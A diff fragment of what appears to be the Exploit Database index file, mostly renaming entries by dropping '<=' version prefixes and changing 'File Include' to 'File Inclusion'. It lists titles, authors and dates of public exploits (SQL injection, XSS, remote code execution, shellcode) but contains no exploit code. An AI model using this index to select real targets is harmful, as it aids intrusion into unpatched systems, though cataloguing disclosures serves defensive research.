36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection Vulnerabilities",2012-02-16,tempe_mendoan,php,webapps,0 -36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Include",2012-02-17,"Ucha Gobejishvili",php,webapps,0 +36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps,0 36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross Site Scripting",2012-02-17,sonyy,php,webapps,0 36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - File Include",2015-04-21,Vulnerability-Lab,ios,webapps,0 36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 36798,platforms/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution",2015-04-21,Vulnerability-Lab,ios,webapps,0 -36799,platforms/bsd/local/36799.c,"OpenBSD <= 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0 +36799,platforms/bsd/local/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0 36800,platforms/php/webapps/36800.txt,"WordPress NEX-Forms < 3.0 - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 -36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0 +36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0 36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 @@ -33226,7 +33226,7 @@ id,file,description,date,author,platform,type,port 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps,0 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 -36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0 +36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQLi (1)",2015-04-23,"Felipe Molina",php,webapps,0 36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQLi (2)",2015-04-23,"Felipe Molina",php,webapps,0 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 @@ -33237,26 +33237,26 @@ id,file,description,date,author,platform,type,port 36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 dnat.cgi createrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 dansguardian.cgi addrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36834,platforms/php/webapps/36834.txt,"Joomla! X-Shop Component 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0 -36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component Local File Include",2012-02-18,KedAns-Dz,php,webapps,0 +36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0 36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 -36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0 +36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 -36840,platforms/multiple/dos/36840.py,"Wireshark <= 1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0 +36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Parameter Directory Traversal",2009-04-17,MustLive,cgi,webapps,0 -36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection",2012-03-14,anonymous,hardware,remote,0 +36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 SQL Injection",2012-03-14,anonymous,hardware,remote,0 37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,Metasploit,linux,remote,52869 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x explanation.php explain Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0 -36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component 'controller' Parameter Local File Include",2012-02-18,KedAns-Dz,php,webapps,0 +36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component 'controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 -36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0 +36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0 36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 @@ -33278,7 +33278,7 @@ id,file,description,date,author,platform,type,port 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 -36884,platforms/linux/remote/36884.py,"libpurple <= 2.8.10 OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 +36884,platforms/linux/remote/36884.py,"libpurple 2.8.10 OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 36885,platforms/php/webapps/36885.txt,"Bontq 'user/' URI Cross Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0 @@ -33300,7 +33300,7 @@ id,file,description,date,author,platform,type,port 36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0 36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0 -36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Include",2012-03-05,"Aung Khant",php,webapps,0 +36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0 36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 @@ -33316,7 +33316,7 @@ id,file,description,date,author,platform,type,port 36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross Site Scripting and SQL Injection Vulnerabilities",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Include",2012-03-14,n0tch,php,webapps,0 +36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross Site Scripting",2012-03-18,sonyy,java,webapps,0 @@ -33339,19 +33339,19 @@ id,file,description,date,author,platform,type,port 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 -36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 +36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection",2012-03-12,l20ot,hardware,remote,0 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 Advanced Search Multiple Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 -36949,platforms/php/webapps/36949.txt,"Xeams <= 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 -36950,platforms/php/webapps/36950.txt,"Syncrify Server <= 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 -36951,platforms/php/webapps/36951.txt,"SynaMan <= 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 +36949,platforms/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 +36950,platforms/php/webapps/36950.txt,"Syncrify Server 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 +36951,platforms/php/webapps/36951.txt,"SynaMan 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 36952,platforms/php/webapps/36952.txt,"WordPress N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0 -36953,platforms/php/webapps/36953.txt,"SynTail <= 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 -36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin <= 4.2.4 - CSRF",2015-05-08,Evex,php,webapps,80 +36953,platforms/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 +36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - CSRF",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player domainMemory ByteArray Use After Free",2015-05-08,Metasploit,windows,remote,0 36957,platforms/php/remote/36957.rb,"WordPress RevSlider File Upload and Execute",2015-05-08,Metasploit,php,remote,80 @@ -33380,7 +33380,7 @@ id,file,description,date,author,platform,type,port 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injection Vulnerabilities",2015-05-11,"Filippo Roncari",php,webapps,0 36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Path Traversal",2015-05-11,"Filippo Roncari",php,webapps,0 36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection",2015-05-11,"Filippo Roncari",php,webapps,0 -36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0 +36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36996,platforms/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution",2015-05-12,Metasploit,unix,remote,80 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 @@ -33405,7 +33405,7 @@ id,file,description,date,author,platform,type,port 37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - index.php conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - index.php conditions[usergroup][] Parameter XSS",2013-03-27,"Aditya Modha",php,webapps,0 37020,platforms/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows 'window.open()' URI Spoofing",2012-03-28,Lostmon,windows,remote,0 -37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Include",2012-03-28,"Canberk BOLAT",php,webapps,0 +37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps,0 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 code_editor.php Multiple Parameter XSS",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x - 'ezjscore' Module Cross Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 @@ -33453,7 +33453,7 @@ id,file,description,date,author,platform,type,port 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 -37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0 +37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0 37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 @@ -33483,11 +33483,11 @@ id,file,description,date,author,platform,type,port 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For Woocommerce File Read",2015-06-10,Kuroi'SH,php,webapps,0 -37254,platforms/php/webapps/37254.txt,"WordPress History Collection <= 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 +37254,platforms/php/webapps/37254.txt,"WordPress History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 -37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 +37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Inclusion and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure + SQL Injection + Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 @@ -33547,11 +33547,11 @@ id,file,description,date,author,platform,type,port 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 +37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer OverFlow PoC",2015-06-01,metacom,windows,remote,0 -37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 -37167,platforms/linux/local/37167.c,"PonyOS <= 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 -37168,platforms/linux/local/37168.txt,"PonyOS <= 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 +37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 +37167,platforms/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 +37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0 37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -33565,7 +33565,7 @@ id,file,description,date,author,platform,type,port 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0 -37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 +37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 37189,platforms/php/webapps/37189.txt,"Media Library Categories Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -33587,7 +33587,7 @@ id,file,description,date,author,platform,type,port 37206,platforms/php/webapps/37206.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 37207,platforms/php/webapps/37207.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.random.php dir Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a 'onlyDB' Parameter Cross Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 -37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post <= 1.0.6 - File Include",2015-06-05,Kuroi'SH,php,webapps,0 +37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post 1.0.6 - File Include",2015-06-05,Kuroi'SH,php,webapps,0 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal and Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 @@ -33598,7 +33598,7 @@ id,file,description,date,author,platform,type,port 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 -37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 +37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 and Crucible 2.5.7 Plugins XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting",2012-05-21,MustLive,php,webapps,0 @@ -33622,9 +33622,9 @@ id,file,description,date,author,platform,type,port 37243,platforms/php/webapps/37243.txt,"WordPress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37244,platforms/php/webapps/37244.txt,"WordPress Plugin 'WP Mobile Edition' - LFI",2015-06-08,"Ali Khalil",php,webapps,0 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection",2015-06-08,"Sebastian khan",php,webapps,0 -37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 +37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 -37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 +37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information 